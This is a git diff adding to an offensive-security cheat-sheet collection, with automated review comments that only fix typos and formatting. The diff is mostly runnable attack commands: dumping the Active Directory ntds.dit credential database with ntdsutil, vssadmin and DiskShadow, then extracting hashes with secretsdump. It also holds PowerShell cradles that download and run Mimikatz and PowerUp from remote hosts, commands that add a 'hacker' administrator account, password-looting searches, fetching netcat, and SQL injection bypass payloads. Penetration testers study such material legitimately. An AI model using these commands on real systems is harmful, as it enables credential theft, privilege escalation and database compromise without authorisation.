diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 088e243..827841c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks" powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" ``` +* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) ## Most common paths to AD compromise 
@@ -82,36 +83,59 @@ Get-NetGPOGroup ### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit) -```c +**Using ndtsutil** +```powershell C:\>ntdsutil ntdsutil: activate instance ntds ntdsutil: ifm ifm: create full c:\pentest ifm: quit ntdsutil: quit +``` -or - +**Using Vshadow** +```powershell vssadmin create shadow /for=C : Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit ``` + +**Using DiskShadow (a Windows signed binary)** +```powershell +diskshadow.txt contains : +set context persistent nowriters +add volume c: alias someAlias +create +expose %someAlias% z: +exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit +delete shadows volume %someAlias% +reset + +then: +diskshadow.exe /s c:\diskshadow.txt +dir c:\exfil +reg.exe save hklm\system c:\exfil\system.bak +``` + +**Extract hashes from ntds.dit** then you need to use secretsdump to extract the hashes ```c secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL ``` -Metasploit module +**Alternatives - modules** +Metasploit modules ```c windows/gather/credentials/domain_hashdump ``` - PowerSploit module ``` Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit ``` + + ### Golden Tickets Forge a TGT, require krbtgt key 
@@ -267,4 +291,5 @@ net group "Domain Admins" hacker2 /add /domain * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) - *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) \ No newline at end of file + *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) + * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md new file mode 100644 index 0000000..55e0f25 --- /dev/null +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
@@ -0,0 +1,157 @@ +# Windows - Privilege Escalation +Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/) + + +## Windows Version and Configuration +```powershell +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +``` + +Architecture +```powershell +wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% +``` + + +List all env variables +```powershell +set +``` + +List all drives +```powershell +wmic logicaldisk get caption || fsutil fsinfo drives +``` + +## User Enumeration + +Get current username +```powershell +echo %USERNAME% || whoami +``` + +List all users +```powershell +net user +whoami /all +``` + +List logon requirements; useable for bruteforcing +```powershell +net accounts +``` + +Get details about a user (i.e. administrator, admin, current user) +```powershell +net user administrator +net user admin +net user %USERNAME% +``` + +List all local groups +```powershell +net localgroup +``` + +Get details about a group (i.e. 
administrators) +```powershell +net localgroup administrators +``` + +## Network Enumeration + +List all network interfaces +```powershell +ipconfig /all +``` + +List current routing table +```powershell +route print +``` + +List the ARP table +```powershell +arp -A +``` + +List all current connections +```powershell +netstat -ano +``` + +List firware state and current configuration +```powershell +netsh advfirewall firewall dump +``` + +List all network shares +```powershell +net share +``` + +## Looting for passwords + +Search for file contents +```powershell +cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt +``` + +Search for a file with a certain filename +```powershell +dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* +``` + +Search the registry for key names +```powershell +REG QUERY HKLM /F "password" /t REG_SZ /S /K +REG QUERY HKCU /F "password" /t REG_SZ /S /K +``` + +Read a value of a certain sub key +```powershell +REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList +``` + +## Processes Enum +What processes are running? +```powershell +tasklist /v +``` + +Which processes are running as "system" +```powershell +tasklist /v /fi "username eq system" +``` + +Do you have powershell magic? 
+```powershell +REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion +``` + + +## Uploading / Downloading files +a wget using powershell +```powershell +powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe" +``` + +wget using bitsadmin (when powershell is not present) +```powershell +cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe" +``` + +now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat +```powershell +%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe +``` + +## Spot the weak service using PowerSploit's PowerUP +```powershell +powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks +``` + +## Thanks to +* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) +* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 9fdfb96..6658cb3 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -1,9 +1,14 @@ # Windows - Using credentials Little tip, if you don't have credentials yet :D -``` +```powershell net user hacker hacker /add net localgroup administrators hacker /add ``` +Some info about your user +```powershell +net user /dom +net user /domain +``` ## Metasploit - SMB 
diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index 7e077be..64b97ce 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -1,6 +1,6 @@ # POSTGRESQL -## PostgreSQL Comment +## PostgreSQL Comments ``` -- /**/ diff --git a/SQL injection/README.md b/SQL injection/README.md index da25544..5d164b2 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -2,13 +2,19 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application ## Summary -* [Entry point detection](#) -* [DBMS Identification](#) -* [SQL injection using SQLmap](#) -* [Authentication bypass](#) -* [Polyglot injection](#) -* [Insert Statement - ON DUPLICATE KEY UPDATE](#) -* [WAF Bypass](#) +* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md) +* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md) +* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md) +* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md) +* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md) +* [Entry point detection](#entry-point-detection) +* [DBMS Identification](#dbms-identification) +* [SQL injection using SQLmap](#sql-injection-using-sqlmap) +* [Authentication bypass](#authentication-bypass) +* [Polyglot injection](#polyglot-injection-multicontext) +* [Second order injection](#second-order-injection) +* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) +* [WAF Bypass](#waf-bypass) ## Entry point detection 
@@ -275,6 +281,11 @@ admin") or "1"="1"/* SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` +## Second order injection +```sql +admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' +``` + ## Insert Statement - ON DUPLICATE KEY UPDATE ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by: ```sql @@ -392,7 +403,7 @@ mysql> mysql> select version(); - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/) - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection) -* MSQQL: +* MSSQL: - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php) - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * ORACLE: diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md index 9629246..b157db4 100644 --- a/SQL injection/SQLite Injection.md +++ b/SQL injection/SQLite Injection.md @@ -1,6 +1,6 @@ # SQLite Injection -## SQLite comment +## SQLite comments ```sql -- /**/
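Review bot: In the "Dumping AD Domain Credentials" hunk of Active Directory Attack.md, the new sub-heading `**Using ndtsutil**` is a typo for `ntdsutil` (the command below it is spelled correctly), and `**Using Vshadow**` labels a block whose command is `vssadmin`, so name the heading after the tool actually shown (that context line also has a stray space in `/for=C :`, which should be `/for=C:`). The DiskShadow block mixes a script file's contents with the commands that consume it inside a single ```powershell fence ("diskshadow.txt contains :" ... "then:"); split it into one fence for the script body and a second for the `diskshadow.exe /s ...`, `dir` and `reg.exe save` commands so each part can be copied on its own. The `secretsdump.py` and Metasploit blocks keep a ```c tag on console text; ```bash or an untagged fence would be accurate. The new heading "Extract hashes from ntds.dit" is immediately repeated by "then you need to use secretsdump to extract the hashes", and the two blank lines inserted before "### Golden Tickets" can go.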
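Review bot: In the references hunk of Active Directory Attack.md, the re-added `*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments]` line still has no space after `*`, so it will not render as a list item; change it to `* [Fun with LDAP, ...]` while it is being touched, and end the file with a newline so the "\ No newline at end of file" marker stops moving to whichever link is added last.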
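Review bot: The new Windows - Privilege Escalation.md has several typos and a broken path: "List firware state" should read "List firewall state" (the command is `netsh advfirewall`), "useable" should be "usable", and "%TEMP%wget" in the download section is missing its backslash (`%TEMP%\wget`, as in the command that follows). The PowerUp one-liner at the end passes `IEX (New-Object Net.WebClient).DownloadString(...); Invoke-AllChecks` to powershell.exe unquoted, unlike the `-c "IEX ...; Invoke-AllChecks"` form used in the Active Directory page's first hunk; quote it the same way for consistency, and note that `-Version 2` only works on hosts where the PowerShell v2 engine is still installed. "Processes Enum" is the only abbreviated heading next to "User Enumeration" and "Network Enumeration". Finally, the "Uploading / Downloading files" commands fetch `wget.exe` and `nc.exe` from addaxsoft.com; since readers will execute whatever is served there, point at the tools' upstream releases or say how to verify the downloaded binaries.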
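Review bot: In the Windows - Using credentials.md hunk, the lead-in "Some info about your user" does not match the commands: `net user /domain` with no account name lists every user account in the domain rather than the current one, and `/dom` is only the abbreviated spelling of `/domain`, so the two lines run the same command. Either retitle the block "List domain users" and keep one line, or use `net user %USERNAME% /domain` if the intent is the current account.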
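Review bot: The five new "CheatSheet ... Injection" entries in the SQL injection README summary use absolute `https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/...` URLs while the rest of the list uses in-page anchors; relative links such as `./MSSQL%20Injection.md` keep working in forks, other branches and local checkouts. Also confirm that `#polyglot-injection-multicontext` matches the actual heading text, since the other anchors correspond to headings visible in this diff ("Second order injection", "Insert Statement - ON DUPLICATE KEY UPDATE") but that one does not appear here.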
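Review bot: The new "Second order injection" section in the SQL injection README is a bare payload with no explanation, so readers cannot tell it apart from the authentication bypass list directly above it; add a sentence stating that the value is first stored by the application without effect (for example as a submitted username) and only acts when a later query reuses the stored value, and that the `UNION ALL SELECT 'admin', '<hash>'` shape assumes that later query returns a username and password hash. The `MSQQL` to `MSSQL` fix is good; the neighbouring reference entries in the same hunk still have a space between `]` and `(` (e.g. `[EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://...)`), which breaks the Markdown link and could be fixed in the same pass.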